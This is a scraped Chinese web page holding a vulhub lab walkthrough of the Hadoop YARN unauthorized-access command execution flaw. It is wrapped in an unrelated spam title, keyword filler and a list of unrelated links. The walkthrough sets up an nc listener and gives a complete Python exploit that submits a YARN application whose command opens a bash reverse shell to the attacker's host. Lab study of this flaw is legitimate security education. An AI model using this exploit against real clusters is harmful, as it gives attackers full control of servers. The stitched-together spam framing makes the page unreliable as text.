当前位置: 首页 > news >正文

沈阳核工业建设工程总公司网站网站设计面试问题

沈阳核工业建设工程总公司网站,网站设计面试问题,大学生项目app策划书,山东建设信息网站数据库安全:Hadoop 未授权访问-命令执行漏洞. Hadoop 未授权访问主要是因为 Hadoop YARN 资源管理系统配置不当,导致可以未经授权进行访问,从而被攻击者恶意利用。攻击者无需认证即可通过 RESTAPI 部署任务来执行任意指令,最终完…

数据库安全:Hadoop 未授权访问-命令执行漏洞.

Hadoop 未授权访问主要是因为 Hadoop YARN 资源管理系统配置不当,导致可以未经授权进行访问,从而被攻击者恶意利用。攻击者无需认证即可通过 RESTAPI 部署任务来执行任意指令,最终完全控制服务器。


目录:

数据库安全:Hadoop 未授权访问-命令执行漏洞.

Hadoop 未授权访问-命令执行漏洞:

开启 vulhub 靶场环境:

Hadoop 未授权访问-命令执行漏洞测试:


Hadoop 未授权访问-命令执行漏洞:

开启 vulhub 靶场环境:

 第一步:切换到 vulhub 目录下

cd vulhub


第二步:切换到 hadoop 目录下

cd hadoop


第三步:切换到 unauthorized-yarn 漏洞目录下.


第四步:开启 漏洞 服务.

docker-compose up -d


第五步:访问  http:// (靶场 IP 地址):8088


   

Hadoop 未授权访问-命令执行漏洞测试:

第一步:访问 /cluster/apps 页面【如果 该页面存在的话,说明存在未授权访问漏洞】

http://192.168.0.106:8088/cluster/apps


第二步:在 攻击机(kali)设置监听.

nc -nvlp 8888// 设置 监听 端口为8888


第三步:编写 Python 执行代码.

import requestsdef shell(url,vps_ip,port):headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36'}response = requests.post(url+"/ws/v1/cluster/apps/new-application",headers=headers)id = response.json()["application-id"]data = {'application-id': id,'application-name': 'getshell','am-container-spec': {'commands': {'command': '/bin/bash -i >& /dev/tcp/%s/%s 0>&1'%(vps_ip,port)},},'application-type': 'YARN'}exploit = requests.post(url+"/ws/v1/cluster/apps",headers=headers,json=data)print("[+] 执行完成!")if __name__ == '__main__':url = input("目标的URL:")vps_ip = input("监听的主机IP地址(kali):")port = input("监听的主机端口(kali):")shell(url,vps_ip,port)

执行代码:


第四步:返回 监听的主机查看结果,发现已经成功.


    

     

     

参考文章:Hadoop 漏洞复现_hadoop命令执行漏洞-CSDN博客

学习链接:第55天:服务攻防-数据库安全_Redis_Hadoop_Mysql_未授权访问_RCE_哔哩哔哩_bilibili

http://www.yayakq.cn/news/331993/

相关文章:

  • 网站返回500错误页面网页前端开发技术
  • 装修网站推广方案在线p图
  • 如何提升网站的权重安徽餐饮加盟网站建设
  • 如何建设简易网站地方门户网站的前途
  • 网站关键词在哪里添加网站开发软件开发流程
  • 网络推广营销工具福州seo按天付费
  • 做网站维护合同长春网站建设工作
  • 网站开发是属于哪个税收分类重庆市建设工程质量信息网
  • 营销型网站首页模板游戏网站制作模板
  • 网站logo做黑页外贸网站seo推广教程
  • 网站制作交易流程检查目录遍历漏洞wordpress站点
  • 北京英文网站建设的原则code wordpress
  • 建网站软件有哪些浙江建设工程造价信息网站
  • 企业网站建设相关书籍精通wordpress
  • 公司网站自己怎么建立找深圳网站建设
  • 人才招聘网网站策划方案修改wordpress 2m
  • 建公司网站免费行情软件下载大全
  • 做筹款的网站需要什么资质建筑模板规格型号
  • 震天建设集团网站企业推广文案范文
  • 做游戏试玩网站阳江市问政平台举报
  • c 网站建设可视化实现wordpress多文章
  • 设计师网站资源网站开发设计流程文档
  • 成都网站定制开发百家号优化
  • 上海专业网站设计北京建设工程信息网官网入口
  • 哪个网站在线做头像好工商登记信息查询系统官网
  • 长治一般做一个网站需要多少钱网站域名备案查询系统
  • 网站集群建设相关的招标...东莞网站公司
  • 网站套模板教程亚马逊站外推广怎么做
  • 手机的网站有哪些wordpress获取id
  • 中国建设银行公积金网站首页做返利网站能赚钱么